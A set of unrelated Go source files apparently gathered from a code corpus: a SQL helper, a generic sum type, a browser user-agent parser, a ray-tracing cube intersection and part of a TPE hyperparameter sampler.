	for _, value := range values {
		placeholders = append(placeholders, "(?)")
		args = append(args, value)
	}

	_, err := tx.Exec(fmt.Sprintf(stmt, strings.Join(placeholders, ", ")), args...)
	return err
}
// Execute the given query and ensure that it yields rows with a single column
// of the given database type. For every row yielded, execute the given
// scanner.
//
// NOTE(review): typeName is currently unused — the column type is not
// actually validated here; any mismatch surfaces as a scan error instead.
// Confirm whether validation was intended before removing the parameter.
func scanSingleColumn(tx *sql.Tx, query string, args []any, typeName string, scan scanFunc) error {
	rows, err := tx.Query(query, args...)
	if err != nil {
		return err
	}
	defer rows.Close()

	for rows.Next() {
		err := scan(rows)
		if err != nil {
			return err
		}
	}

	// Surface any error encountered during iteration.
	err = rows.Err()
	if err != nil {
		return err
	}

	return nil
}
// scanFunc scans a single result row into Go values.
type scanFunc func(*sql.Rows) error
package st3
// A sum type which can have 3 different types.
//
// Exactly one of val0/val1/val2 is meaningful at a time; which records the
// index (0, 1 or 2) of the active alternative. The zero value behaves as a
// SumType3 holding the zero value of T0.
type SumType3[T0, T1, T2 any] struct {
	which uint8
	val0  T0
	val1  T1
	val2  T2
}

// Creates a new SumType3 containing a value of type T0.
func New0[T0, T1, T2 any](value T0) SumType3[T0, T1, T2] {
	return SumType3[T0, T1, T2]{
		which: 0,
		val0:  value,
	}
}

// Creates a new SumType3 containing a value of type T1.
func New1[T0, T1, T2 any](value T1) SumType3[T0, T1, T2] {
	return SumType3[T0, T1, T2]{
		which: 1,
		val1:  value,
	}
}

// Creates a new SumType3 containing a value of type T2.
func New2[T0, T1, T2 any](value T2) SumType3[T0, T1, T2] {
	return SumType3[T0, T1, T2]{
		which: 2,
		val2:  value,
	}
}
// Returns the index of the currently stored type (0, 1 or 2).
func (st *SumType3[T0, T1, T2]) Which() uint8 {
	return st.which
}

// Tells whether the stored value is of type T0.
func (st *SumType3[T0, T1, T2]) Has0() bool {
	return st.which == 0
}

// Tells whether the stored value is of type T1.
func (st *SumType3[T0, T1, T2]) Has1() bool {
	return st.which == 1
}

// Tells whether the stored value is of type T2.
func (st *SumType3[T0, T1, T2]) Has2() bool {
	return st.which == 2
}
// If the stored value is of type T0, returns it and true; otherwise, returns a
// default value and false.
func (st *SumType3[T0, T1, T2]) Get0() (T0, bool) {
	if st.which == 0 {
		return st.val0, true
	}
	var zero T0
	return zero, false
}

// If the stored value is of type T1, returns it and true; otherwise, returns a
// default value and false.
func (st *SumType3[T0, T1, T2]) Get1() (T1, bool) {
	if st.which == 1 {
		return st.val1, true
	}
	var zero T1
	return zero, false
}

// If the stored value is of type T2, returns it and true; otherwise, returns a
// default value and false.
func (st *SumType3[T0, T1, T2]) Get2() (T2, bool) {
	if st.which == 2 {
		return st.val2, true
	}
	var zero T2
	return zero, false
}
// Calls the function according to the stored value; the other functions won't
// be called. This is equivalent to an exhaustive pattern matching.
func (st *SumType3[T0, T1, T2]) Match(
case0 func(value T0),
case1 func(value T1),
case2 func(value T2)) {
switch st.which {
case 0:
case0(st.val0)
case 1:
case1(st.val1)
case 2:
case2(st.val2)
}
} | st3/sumtype3.go | 0.571049 | 0.447702 | sumtype3.go | starcoder |
package client
import (
	"path/filepath"
	"sort"

	gover "github.com/mcuadros/go-version"
	. "github.com/vtomar10/devicedetector/parser"
)
// Known browsers mapped to their internal short codes
var availableBrowsers = map[string]string{
`1B`: `115 Browser`,
`2B`: `2345 Browser`,
`36`: `360 Phone Browser`,
`3B`: `360 Browser`,
`AA`: `Avant Browser`,
`AB`: `ABrowse`,
`AF`: `ANT Fresco`,
`AG`: `ANTGalio`,
`AL`: `Aloha Browser`,
`AH`: `Aloha Browser Lite`,
`AM`: `Amaya`,
`AO`: `Amigo`,
`AN`: `Android Browser`,
`AE`: `AOL Desktop`,
`AD`: `AOL Shield`,
`AR`: `Arora`,
`AX`: `Arctic Fox`,
`AV`: `Amiga Voyager`,
`AW`: `Amiga Aweb`,
`A0`: `Atom`,
`AT`: `Atomic Web Browser`,
`AS`: `Avast Secure Browser`,
`VG`: `AVG Secure Browser`,
`BA`: `Beaker Browser`,
`BM`: `Beamrise`,
`BB`: `BlackBerry Browser`,
`BD`: `Baidu Browser`,
`BS`: `Baidu Spark`,
`BI`: `Basilisk`,
`BE`: `Beonex`,
`BH`: `BlackHawk`,
`BJ`: `Bunjalloo`,
`BL`: `B-Line`,
`BR`: `Brave`,
`BK`: `BriskBard`,
`BX`: `BrowseX`,
`CA`: `Camino`,
`CL`: `CCleaner`,
`C0`: `Centaury`,
`CC`: `Coc Coc`,
`C2`: `Colibri`,
`CD`: `Comodo Dragon`,
`C1`: `Coast`,
`CX`: `Charon`,
`CE`: `CM Browser`,
`CF`: `Chrome Frame`,
`HC`: `Headless Chrome`,
`CH`: `Chrome`,
`CI`: `Chrome Mobile iOS`,
`CK`: `Conkeror`,
`CM`: `Chrome Mobile`,
`CN`: `CoolNovo`,
`CO`: `CometBird`,
`CB`: `COS Browser`,
`CP`: `ChromePlus`,
`CR`: `Chromium`,
`CY`: `Cyberfox`,
`CS`: `Cheshire`,
`CT`: `Crusta`,
`CU`: `Cunaguaro`,
`CV`: `Chrome Webview`,
`DB`: `dbrowser`,
`DE`: `Deepnet Explorer`,
`DT`: `Delta Browser`,
`DF`: `Dolphin`,
`DO`: `Dorado`,
`DL`: `Dooble`,
`DI`: `Dillo`,
`DD`: `DuckDuckGo Privacy Browser`,
`EC`: `Ecosia`,
`EI`: `Epic`,
`EL`: `Elinks`,
`EB`: `Element Browser`,
`EE`: `Elements Browser`,
`EZ`: `eZ Browser`,
`EU`: `EUI Browser`,
`EP`: `GNOME Web`,
`ES`: `Espial TV Browser`,
`FA`: `Falkon`,
`FX`: `Faux Browser`,
`F1`: `Firefox Mobile iOS`,
`FB`: `Firebird`,
`FD`: `Fluid`,
`FE`: `Fennec`,
`FF`: `Firefox`,
`FK`: `Firefox Focus`,
`FY`: `Firefox Reality`,
`FR`: `Firefox Rocket`,
`FL`: `Flock`,
`FM`: `Firefox Mobile`,
`FW`: `Fireweb`,
`FN`: `Fireweb Navigator`,
`FU`: `FreeU`,
`GA`: `Galeon`,
`GB`: `Glass Browser`,
`GE`: `Google Earth`,
`HA`: `Hawk Turbo Browser`,
`HO`: `hola! Browser`,
`HJ`: `HotJava`,
`HU`: `Huawei Browser`,
`IB`: `IBrowse`,
`IC`: `iCab`,
`I2`: `iCab Mobile`,
`I1`: `Iridium`,
`I3`: `Iron Mobile`,
`I4`: `IceCat`,
`ID`: `IceDragon`,
`IV`: `Isivioo`,
`IW`: `Iceweasel`,
`IE`: `Internet Explorer`,
`IM`: `IE Mobile`,
`IR`: `Iron`,
`JS`: `Jasmine`,
`JI`: `Jig Browser`,
`JP`: `Jig Browser Plus`,
`JO`: `Jio Browser`,
`KB`: `K.Browser`,
`KI`: `Kindle Browser`,
`KM`: `K-meleon`,
`KO`: `Konqueror`,
`KP`: `Kapiko`,
`KN`: `Kinza`,
`KW`: `Kiwi`,
`KY`: `Kylo`,
`KZ`: `Kazehakase`,
`LB`: `Cheetah Browser`,
`LF`: `LieBaoFast`,
`LG`: `LG Browser`,
`LH`: `Light`,
`LI`: `Links`,
`LO`: `Lovense Browser`,
`LU`: `LuaKit`,
`LL`: `Lulumi`,
`LS`: `Lunascape`,
`LN`: `Lunascape Lite`,
`LX`: `Lynx`,
`M1`: `mCent`,
`MB`: `MicroB`,
`MC`: `NCSA Mosaic`,
`MZ`: `Meizu Browser`,
`ME`: `Mercury`,
`MF`: `Mobile Safari`,
`MI`: `Midori`,
`MO`: `Mobicip`,
`MU`: `MIUI Browser`,
`MS`: `Mobile Silk`,
`MN`: `Minimo`,
`MT`: `Mint Browser`,
`MX`: `Maxthon`,
`MY`: `Mypal`,
`NB`: `Nokia Browser`,
`NO`: `Nokia OSS Browser`,
`NV`: `Nokia Ovi Browser`,
`NX`: `Nox Browser`,
`NE`: `NetSurf`,
`NF`: `NetFront`,
`NL`: `NetFront Life`,
`NP`: `NetPositive`,
`NS`: `Netscape`,
`NT`: `NTENT Browser`,
`OC`: `Oculus Browser`,
`O1`: `Opera Mini iOS`,
`OB`: `Obigo`,
`OD`: `Odyssey Web Browser`,
`OF`: `Off By One`,
`HH`: `OhHai Browser`,
`OE`: `ONE Browser`,
`OX`: `Opera GX`,
`OG`: `Opera Neon`,
`OH`: `Opera Devices`,
`OI`: `Opera Mini`,
`OM`: `Opera Mobile`,
`OP`: `Opera`,
`ON`: `Opera Next`,
`OO`: `Opera Touch`,
`OS`: `Ordissimo`,
`OR`: `Oregano`,
`O0`: `Origin In-Game Overlay`,
`OY`: `Origyn Web Browser`,
`OV`: `Openwave Mobile Browser`,
`OW`: `OmniWeb`,
`OT`: `Otter Browser`,
`PL`: `Palm Blazer`,
`PM`: `Pale Moon`,
`PY`: `Polypane`,
`PP`: `Oppo Browser`,
`PR`: `Palm Pre`,
`PU`: `Puffin`,
`PW`: `Palm WebPro`,
`PA`: `Palmscape`,
`PX`: `Phoenix`,
`PO`: `Polaris`,
`PT`: `Polarity`,
`PS`: `Microsoft Edge`,
`Q1`: `QQ Browser Mini`,
`QQ`: `QQ Browser`,
`QT`: `Qutebrowser`,
`QZ`: `QupZilla`,
`QM`: `Qwant Mobile`,
`QW`: `QtWebEngine`,
`RE`: `Realme Browser`,
`RK`: `Rekonq`,
`RM`: `RockMelt`,
`SB`: `Samsung Browser`,
`SA`: `Sailfish Browser`,
`SC`: `SEMC-Browser`,
`SE`: `Sogou Explorer`,
`SF`: `Safari`,
`S5`: `Safe Exam Browser`,
`SW`: `SalamWeb`,
`SH`: `Shiira`,
`S1`: `SimpleBrowser`,
`SY`: `Sizzy`,
`SK`: `Skyfire`,
`SS`: `Seraphic Sraf`,
`SL`: `Sleipnir`,
`SN`: `Snowshoe`,
`SO`: `Sogou Mobile Browser`,
`S2`: `Splash`,
`SI`: `Sputnik Browser`,
`SR`: `Sunrise`,
`SP`: `SuperBird`,
`SU`: `Super Fast Browser`,
`S3`: `surf`,
`S0`: `START Internet Browser`,
`S4`: `Steam In-Game Overlay`,
`ST`: `Streamy`,
`SX`: `Swiftfox`,
`SZ`: `Seznam Browser`,
`TO`: `t-online.de Browser`,
`TA`: `Tao Browser`,
`TF`: `TenFourFox`,
`TB`: `Tenta Browser`,
`TZ`: `Tizen Browser`,
`TU`: `Tungsten`,
`TG`: `ToGate`,
`TS`: `TweakStyle`,
`TV`: `TV Bro`,
`UB`: `UBrowser`,
`UC`: `UC Browser`,
`UM`: `UC Browser Mini`,
`UT`: `UC Browser Turbo`,
`UZ`: `Uzbl`,
`VI`: `Vivaldi`,
`VV`: `vivo Browser`,
`VB`: `Vision Mobile Browser`,
`VM`: `VMware AirWatch`,
`WI`: `Wear Internet Browser`,
`WP`: `Web Explorer`,
`WE`: `WebPositive`,
`WF`: `Waterfox`,
`WH`: `Whale Browser`,
`WO`: `wOSBrowser`,
`WT`: `WeTab Browser`,
`YJ`: `Yahoo! Japan Browser`,
`YA`: `Yandex Browser`,
`YL`: `Yandex Browser Lite`,
`XI`: `Xiino`,
`XV`: `Xvast`,
// detected browsers in older versions
// `IA` : `Iceape`, : pim
// `SM` : `SeaMonkey`, : pim
}
// Browser families mapped to the short codes of the associated browsers
var browserFamilies = map[string][]string{
`Android Browser`: []string{`AN`, `MU`},
`BlackBerry Browser`: []string{`BB`},
`Baidu`: []string{`BD`, `BS`},
`Amiga`: []string{`AV`, `AW`},
`Chrome`: []string{`CH`, `BA`, `BR`, `CC`, `CD`, `CM`, `CI`, `CF`, `CN`, `CR`, `CP`, `DD`, `IR`, `RM`, `AO`, `TS`, `VI`, `PT`, `AS`, `TB`, `AD`, `SB`, `WP`, `I3`, `CV`, `WH`, `SZ`, `QW`, `LF`, `KW`, `2B`, `CE`, `EC`, `MT`, `MS`, `HA`, `OC`, `MZ`, `BM`, `KN`, `SW`, `M1`, `FA`, `TA`, `AH`, `CL`, `SU`, `EU`, `UB`, `LO`, `VG`, `TV`, `A0`, `1B`, `S4`, `EE`, `AE`, `VM`, `O0`, `TG`, `GB`, `SY`, `HH`, `YJ`, `LL`, `TU`, `XV`, `C2`},
`Firefox`: []string{`FF`, `FE`, `FM`, `SX`, `FB`, `PX`, `MB`, `EI`, `WF`, `CU`, `TF`, `QM`, `FR`, `I4`, `GZ`, `MO`, `F1`, `BI`, `MN`, `BH`, `TO`, `OS`, `MY`, `FY`, `AX`, `C0`, `LH`, `S5`},
`Internet Explorer`: []string{`IE`, `IM`, `PS`},
`Konqueror`: []string{`KO`},
`NetFront`: []string{`NF`},
`NetSurf`: []string{`NE`},
`Nokia Browser`: []string{`NB`, `NO`, `NV`, `DO`},
`Opera`: []string{`OP`, `OM`, `OI`, `ON`, `OO`, `OG`, `OH`, `O1`, `OX`},
`Safari`: []string{`SF`, `MF`, `SO`},
`Sailfish Browser`: []string{`SA`},
}
// Browsers that are available for mobile devices only
var mobileOnlyBrowsers = []string{
`36`, `OC`, `PU`, `SK`, `MF`, `OI`, `OM`, `DD`, `DB`, `ST`, `BL`, `IV`, `FM`, `C1`, `AL`, `SA`, `SB`, `FR`, `WP`, `HA`, `NX`, `HU`, `VV`, `RE`, `CB`, `MZ`, `UM`, `FK`, `FX`, `WI`, `MN`, `M1`, `AH`, `SU`, `EU`, `EZ`, `UT`, `DT`, `S0`,
}
// GetBrowserFamily looks up which family the given browser short code
// belongs to. It returns the family name and true, or "" and false when the
// short code is not part of any known family.
func GetBrowserFamily(browserLabel string) (string, bool) {
	for family, shortCodes := range browserFamilies {
		for _, code := range shortCodes {
			if code == browserLabel {
				return family, true
			}
		}
	}
	return "", false
}
// Returns if the given browser is mobile only
//
// The argument is first checked directly against the mobile-only short
// codes. Otherwise, if it is a known short code, its full name is checked
// against the same list.
// NOTE(review): mobileOnlyBrowsers contains short codes, while
// availableBrowsers maps short codes to full names — so the second check
// compares a full name against short codes and looks like it can never
// match; confirm whether the intended lookup was the reverse map.
func IsMobileOnlyBrowser(browser string) bool {
	if ArrayContainsString(mobileOnlyBrowsers, browser) {
		return true
	}
	if v, ok := availableBrowsers[browser]; ok {
		return ArrayContainsString(mobileOnlyBrowsers, v)
	}
	return false
}
// BrowserMatchResult is the result type returned by Browser.Parse.
type BrowserMatchResult = ClientMatchResult

// Engine describes which rendering engine a browser uses: a default engine
// name plus overrides keyed by the minimum browser version they apply from.
type Engine struct {
	Default  string            `yaml:"default" json:"default"`
	Versions map[string]string `yaml:"versions" json:"versions"`
}

// BrowserItem is one regex entry from the browsers fixture file.
type BrowserItem struct {
	Regular `yaml:",inline" json:",inline"`
	Name    string  `yaml:"name" json:"name"`
	Version string  `yaml:"version" json:"version"`
	Engine  *Engine `yaml:"engine" json:"engine"`
}
// Client parser for browser detection
type Browser struct {
	Regexes []*BrowserItem       // fixture regex entries, tried in order by Parse
	engine  BrowserEngine        // fallback engine parser (browser-engine fixtures)
	verCache map[string]*Version // lazily compiled engine-version parsers, keyed by engine name
}
// ParserNameBrowser is the registry key and result Type of this parser.
const ParserNameBrowser = `browser`

// FixtureFileBrowser is the YAML fixture file the browser regexes are read from.
const FixtureFileBrowser = `browsers.yml`

// init registers the browser parser factory with the client parser registry.
func init() {
	RegClientParser(ParserNameBrowser,
		func(dir string) ClientParser {
			return NewBrowser(filepath.Join(dir, FixtureFileBrowser))
		})
}
// NewBrowser returns a Browser parser loaded from the given fixture file.
//
// NOTE(review): a Load failure is swallowed and nil is returned, so callers
// must nil-check the result; surfacing the error would require a signature
// change.
func NewBrowser(fileName string) *Browser {
	b := &Browser{}
	b.engine.ParserName = ParserNameBrowserEngine
	if err := b.Load(fileName); err != nil {
		return nil
	}
	return b
}
// Load reads the browser regex fixtures from file and the engine fixtures
// from the sibling engine fixture file in the same directory, and resets
// the engine-version regex cache.
func (b *Browser) Load(file string) error {
	b.verCache = make(map[string]*Version)
	var regexes []*BrowserItem
	if err := ReadYamlFile(file, &regexes); err != nil {
		return err
	}
	// Derive the engine fixture path from the directory of the browser
	// fixture file. The previous string-slicing approach assumed file
	// literally ended in FixtureFileBrowser and silently produced a wrong
	// path otherwise.
	engineFile := filepath.Join(filepath.Dir(file), FixtureFileBrowserEngine)
	if err := b.engine.Load(engineFile); err != nil {
		return err
	}
	b.Regexes = regexes
	return nil
}
// PreMatch always reports true: the browser parser has no cheap
// pre-filter, so every user agent goes through the full Parse.
func (b *Browser) PreMatch(ua string) bool {
	return true
}
// Parse tries each fixture regex in order against ua and returns the first
// match whose interpolated name is a known browser, filling in the version,
// rendering engine and engine version. It returns nil when no regex matches
// or the matched name is not in availableBrowsers.
func (b *Browser) Parse(ua string) *BrowserMatchResult {
	for _, regex := range b.Regexes {
		matches := regex.MatchUserAgent(ua)
		if len(matches) > 0 {
			// Substitute capture groups into the fixture's name template.
			name := BuildByMatch(regex.Name, matches)
			// Resolve the canonical short code via a case-insensitive
			// name lookup.
			for browserShort, browserName := range availableBrowsers {
				if StringEqualIgnoreCase(name, browserName) {
					version := BuildVersion(regex.Version, matches)
					engine := b.BuildEngine(regex.Engine, version, ua)
					engineVersion := b.BuildEngineVersion(engine, ua)
					return &BrowserMatchResult{
						Type:          ParserNameBrowser,
						Name:          browserName,
						ShortName:     browserShort,
						Version:       version,
						Engine:        engine,
						EngineVersion: engineVersion,
					}
				}
			}
		}
	}
	return nil
}
// BuildEngine resolves the rendering engine for a parsed browser: the
// fixture's default engine, overridden by the entry with the highest
// version threshold that browserVersion satisfies, falling back to parsing
// the engine directly out of ua when no fixture data yields one.
func (b *Browser) BuildEngine(engineData *Engine, browserVersion, ua string) string {
	engine := ""
	if engineData != nil {
		engine = engineData.Default
		// Map iteration order is random in Go, so sort the threshold
		// versions ascending before scanning; the previous code let an
		// arbitrary matching entry win, making the result nondeterministic
		// whenever browserVersion satisfied more than one threshold.
		versions := make([]string, 0, len(engineData.Versions))
		for version := range engineData.Versions {
			versions = append(versions, version)
		}
		sort.Slice(versions, func(i, j int) bool {
			return gover.CompareSimple(versions[i], versions[j]) < 0
		})
		for _, version := range versions {
			if gover.CompareSimple(browserVersion, version) >= 0 {
				engine = engineData.Versions[version]
			}
		}
	}
	if engine == "" {
		if engineResult := b.engine.Parse(ua); engineResult != nil {
			engine = engineResult.Name
		}
	}
	return engine
}
func (b *Browser) BuildEngineVersion(engine, ua string) string {
if engine == "" {
return ""
}
v, ok := b.verCache[engine]
if !ok {
v = &Version{Engine: engine}
v.Compile()
b.verCache[engine] = v
}
return v.Parse(ua)
} | parser/client/browser.go | 0.602412 | 0.671821 | browser.go | starcoder |
package ray
import "math"
// Cube is a canonical cube, centered of origin, of side 2 (-1 to +1)
//
// It embeds a Transform (local<->global frame mapping) and a Surface
// (material properties).
type Cube struct {
	Transform
	Surface
	name string // display name, prefixed with "cube:" by SetName
}
// NewCube instantiate a new cube
// with the identity transform and the default surface.
func NewCube() *Cube {
	return &Cube{
		Transform: IDTransform,
		Surface:   DefaultSurface,
	}
}
// SetName sets the cube's display name, prefixed with "cube:".
func (c *Cube) SetName(name string) {
	c.name = "cube:" + name
}

// Name returns the Cube's name
func (c *Cube) Name() string {
	return c.name
}

// Surf returns a pointer to the cube's surface so callers can mutate it.
func (c *Cube) Surf() *Surface {
	return &c.Surface
}
// Translate applies a translation to the cube
// and returns the cube to allow chaining.
func (c *Cube) Translate(x, y, z float64) *Cube {
	c.Transform.Translate(x, y, z)
	return c
}

// RotateX applies a rotation around x-axis to the Cube
func (c *Cube) RotateX(x float64) *Cube {
	c.Transform.RotateX(x)
	return c
}

// RotateY applies a rotation around y-axis to the Cube
func (c *Cube) RotateY(y float64) *Cube {
	c.Transform.RotateY(y)
	return c
}

// RotateZ applies a rotation around z-axis to the Cube
func (c *Cube) RotateZ(z float64) *Cube {
	c.Transform.RotateZ(z)
	return c
}

// Scale applies a scaling transform to the Cube
func (c *Cube) Scale(x, y, z float64) *Cube {
	c.Transform.Scale(x, y, z)
	return c
}
// Intersect computes the nearest intersection of r with the cube, or nil
// when the ray misses.
//
// The ray is transformed into the cube's local frame, tested against the six
// axis-aligned faces x, y, z = ±1, and the closest hit (smallest t above
// Epsilon) is transformed back into the global frame.
//
// NOTE(review): the face bound checks mix (-1-Epsilon, 1-Epsilon) with
// (-1+Epsilon, 1+Epsilon) from face to face (e.g. the y=-1 face accepts
// x in (-1-ε, 1-ε) while y=+1 accepts x in (-1+ε, 1+ε)). This asymmetry
// looks unintentional — confirm against the renderer's edge-handling tests
// before changing it.
func (c *Cube) Intersect(r Ray) *Hit {
	var x, y, z, t float64
	locRay := c.RayToLocal(r)
	localDir := locRay.dir
	localPoint := locRay.pt
	minT := math.MaxFloat64
	var h Hit
	h.globRay = r
	h.locRay = locRay
	// inters y = -1 et y = 1
	if !isNul(localDir[Y]) {
		// y = -1
		t = (-1 - localPoint[Y]) / localDir[Y]
		if t > Epsilon {
			x = localPoint[X] + t*localDir[X]
			if (x > -1-Epsilon) && (x < 1-Epsilon) {
				z = localPoint[Z] + t*localDir[Z]
				if (z > -1-Epsilon) && (z < 1-Epsilon) {
					minT = t
					h.locNorm.pt = Point3{x, -1, z}
					h.locNorm.dir = Vector3{0, -1, 0}
				}
			}
		}
		// y =1
		t = (1 - localPoint[Y]) / localDir[Y]
		if (t > Epsilon) && (t < minT) {
			x = localPoint[X] + t*localDir[X]
			if (x > -1+Epsilon) && (x < 1+Epsilon) {
				z = localPoint[Z] + t*localDir[Z]
				if (z > -1+Epsilon) && (z < 1+Epsilon) {
					minT = t
					h.locNorm.pt = Point3{x, 1, z}
					h.locNorm.dir = Vector3{0, 1, 0}
				}
			}
		}
	}
	// inters x = -1 et x = 1
	if !isNul(localDir[X]) {
		// x = -1
		t = (-1 - localPoint[X]) / localDir[X]
		if (t > Epsilon) && (t < minT) {
			y = localPoint[Y] + t*localDir[Y]
			if (y > -1+Epsilon) && (y < 1+Epsilon) {
				z = localPoint[Z] + t*localDir[Z]
				if (z > -1+Epsilon) && (z < 1+Epsilon) {
					minT = t
					h.locNorm.pt = Point3{-1, y, z}
					h.locNorm.dir = Vector3{-1, 0, 0}
				}
			}
		}
		// x = 1
		t = (1 - localPoint[X]) / localDir[X]
		if (t > Epsilon) && (t < minT) {
			y = localPoint[Y] + t*localDir[Y]
			if (y > -1-Epsilon) && (y < 1-Epsilon) {
				z = localPoint[Z] + t*localDir[Z]
				if (z > -1-Epsilon) && (z < 1-Epsilon) {
					minT = t
					h.locNorm.pt = Point3{1, y, z}
					h.locNorm.dir = Vector3{1, 0, 0}
				}
			}
		}
	}
	// inters z = -1 et z = 1
	if !isNul(localDir[Z]) {
		// z = -1
		t = (-1 - localPoint[Z]) / localDir[Z]
		if (t > Epsilon) && (t < minT) {
			y = localPoint[Y] + t*localDir[Y]
			if (y > -1+Epsilon) && (y < 1+Epsilon) {
				x = localPoint[X] + t*localDir[X]
				if (x > -1-Epsilon) && (x < 1-Epsilon) {
					minT = t
					h.locNorm.pt = Point3{x, y, -1}
					h.locNorm.dir = Vector3{0, 0, -1}
				}
			}
		}
		// z = 1
		t = (1 - localPoint[Z]) / localDir[Z]
		if (t > Epsilon) && (t < minT) {
			y = localPoint[Y] + t*localDir[Y]
			if (y > -1-Epsilon) && (y < 1-Epsilon) {
				x = localPoint[X] + t*localDir[X]
				if (x > -1+Epsilon) && (x < 1+Epsilon) {
					minT = t
					h.locNorm.pt = Point3{x, y, 1}
					h.locNorm.dir = Vector3{0, 0, 1}
				}
			}
		}
	}
	// A hit was recorded iff minT moved below its sentinel value.
	if minT < math.MaxFloat64-Epsilon {
		h.globNorm = c.RayToGlobal(h.locNorm)
		h.globNorm.Normalize()
		h.Surface = &c.Surface
		return &h
	}
	return nil
}
func (c *Cube) MinMax() (Point3, Point3) {
return Point3{-1, -1, -1}, Point3{1, 1, 1}
} | cube.go | 0.821939 | 0.488344 | cube.go | starcoder |
package tpe
import (
"math"
"math/rand"
"sort"
"sync"
"github.com/c-bata/goptuna"
"github.com/c-bata/goptuna/internal/random"
"gonum.org/v1/gonum/floats"
)
// eps guards divisions and logarithms against zero values.
const eps = 1e-12

// FuncGamma is a type of gamma function.
// It maps the number of observed trials to the size of the "below" group.
type FuncGamma func(int) int

// FuncWeights is a type of weights function.
// It maps the number of mixture components to their (unnormalized) weights.
type FuncWeights func(int) []float64
// DefaultGamma is a default gamma function.
//
// It returns ceil(0.1*x) capped at 25 — the number of "below" (good)
// observations used when splitting trials.
func DefaultGamma(x int) int {
	if n := int(math.Ceil(0.1 * float64(x))); n <= 25 {
		return n
	}
	return 25
}
// HyperoptDefaultGamma is a default gamma function of Hyperopt.
//
// Like DefaultGamma it caps the number of "below" observations at 25. The
// previous implementation had the comparison branches swapped and returned
// max(ceil(0.25*x), 25) — it could never return fewer than 25 — instead of
// min(ceil(0.25*x), 25).
// NOTE(review): Hyperopt's reference gamma uses ceil(0.25*sqrt(x)); the
// linear 0.25*x here is kept as-is pending confirmation against upstream.
func HyperoptDefaultGamma(x int) int {
	a := int(math.Ceil(0.25 * float64(x)))
	if a > 25 {
		return 25
	}
	return a
}
// DefaultWeights is a default weights function.
//
// For up to 25 observations every component gets weight 1. Beyond that, the
// oldest x-25 components get linearly ramped-down weights (from 1/x up
// towards 1) and the newest 25 keep weight 1, so recent observations
// dominate the Parzen estimator.
// NOTE(review): the exact endpoint behavior depends on the project's
// linspace helper (endpoint flag true) — confirm it matches numpy.linspace.
func DefaultWeights(x int) []float64 {
	if x == 0 {
		return []float64{}
	} else if x < 25 {
		return ones1d(x)
	} else {
		ramp := linspace(1.0/float64(x), 1.0, x-25, true)
		flat := ones1d(25)
		return append(ramp, flat...)
	}
}
// Compile-time check that Sampler satisfies goptuna.Sampler.
var _ goptuna.Sampler = &Sampler{}

// Sampler returns the next search points by using TPE.
type Sampler struct {
	numberOfStartupTrials int       // trials sampled randomly before TPE kicks in
	numberOfEICandidates  int       // candidate draws per parameter when maximizing EI
	gamma                 FuncGamma // splits trials into "below" (good) and "above" groups
	params                ParzenEstimatorParams
	rng                   *rand.Rand
	randomSampler         *goptuna.RandomSampler // fallback used during startup trials
	mu                    sync.Mutex
}
// NewSampler returns the TPE sampler.
//
// Defaults: 10 startup trials, 24 EI candidates, gamma = DefaultGamma, and
// a Parzen estimator with a prior, magic clipping and DefaultWeights.
// Options are applied in order and may override any of these.
// NOTE(review): the RNG is seeded with the constant 0, so samplers built
// without an option overriding rng produce identical sample sequences.
func NewSampler(opts ...SamplerOption) *Sampler {
	sampler := &Sampler{
		numberOfStartupTrials: 10,
		numberOfEICandidates:  24,
		gamma:                 DefaultGamma,
		params: ParzenEstimatorParams{
			ConsiderPrior:     true,
			PriorWeight:       1.0,
			ConsiderMagicClip: true,
			ConsiderEndpoints: false,
			Weights:           DefaultWeights,
		},
		rng:           rand.New(rand.NewSource(0)),
		randomSampler: goptuna.NewRandomSampler(),
	}
	for _, opt := range opts {
		opt(sampler)
	}
	return sampler
}
// splitObservationPairs partitions observed parameter values into the
// "below" group (the gamma(n) best trials by loss) and the "above" group
// (all remaining trials).
//
// lossAscending holds trial indices ordered by loss; each half is re-sorted
// ascending so the selected parameter values keep their original
// observation order.
func (s *Sampler) splitObservationPairs(
	configVals []float64,
	lossVals [][2]float64,
) ([]float64, []float64) {
	nbelow := s.gamma(len(configVals))
	lossAscending := argSort2d(lossVals)

	sort.Ints(lossAscending[:nbelow])
	below := choice(configVals, lossAscending[:nbelow])

	sort.Ints(lossAscending[nbelow:])
	above := choice(configVals, lossAscending[nbelow:])
	return below, above
}
// sampleFromGMM draws size samples from the Gaussian mixture described by
// parzenEstimator, truncated to [low, high) by rejection sampling.
//
// When isLog is true the draws are exponentiated; when q > 0 they are then
// rounded to the nearest multiple of q.
// NOTE(review): the rejection loop has no iteration cap — if almost no
// mixture mass lies inside [low, high) this can spin for a very long time;
// confirm callers guarantee reasonable truncation bounds.
func (s *Sampler) sampleFromGMM(parzenEstimator *ParzenEstimator, low, high float64, size int, q float64, isLog bool) []float64 {
	weights := parzenEstimator.Weights
	mus := parzenEstimator.Mus
	sigmas := parzenEstimator.Sigmas
	nsamples := size

	if low > high {
		panic("the low should be lower than the high")
	}

	samples := make([]float64, 0, nsamples)
	for {
		if len(samples) == nsamples {
			break
		}
		// Pick a mixture component proportionally to its weight, then draw
		// from that component's Gaussian.
		active, err := random.ArgMaxMultinomial(weights)
		if err != nil {
			panic(err)
		}
		x := s.rng.NormFloat64()
		draw := x*sigmas[active] + mus[active]
		// Keep only draws inside the truncation interval.
		if low <= draw && draw < high {
			samples = append(samples, draw)
		}
	}

	if isLog {
		for i := range samples {
			samples[i] = math.Exp(samples[i])
		}
	}
	if q > 0 {
		for i := range samples {
			samples[i] = math.Round(samples[i]/q) * q
		}
	}
	return samples
}
// normalCDF evaluates the normal CDF at x for each (mu, sigma) pair,
// i.e. Phi((x-mu)/sigma), clamping the denominator away from zero with eps.
func (s *Sampler) normalCDF(x float64, mu []float64, sigma []float64) []float64 {
	results := make([]float64, len(mu))
	for i := range mu {
		z := (x - mu[i]) / math.Max(math.Sqrt(2)*sigma[i], eps)
		results[i] = 0.5 * (1 + math.Erf(z))
	}
	return results
}
// logNormalCDF evaluates the log-normal CDF at x for each (mu, sigma) pair,
// i.e. Phi((log(x)-mu)/sigma), with x clamped to at least eps before the
// logarithm. It panics when x is negative.
func (s *Sampler) logNormalCDF(x float64, mu []float64, sigma []float64) []float64 {
	if x < 0 {
		panic("negative argument is given to logNormalCDF")
	}
	l := len(mu)
	results := make([]float64, l)
	for i := 0; i < l; i++ {
		denominator := math.Log(math.Max(x, eps)) - mu[i]
		numerator := math.Max(math.Sqrt(2)*sigma[i], eps)
		z := denominator / numerator
		// 0.5 + 0.5*erf(z) is the standard normal CDF of z.
		results[i] = 0.5 + (0.5 * math.Erf(z))
	}
	return results
}
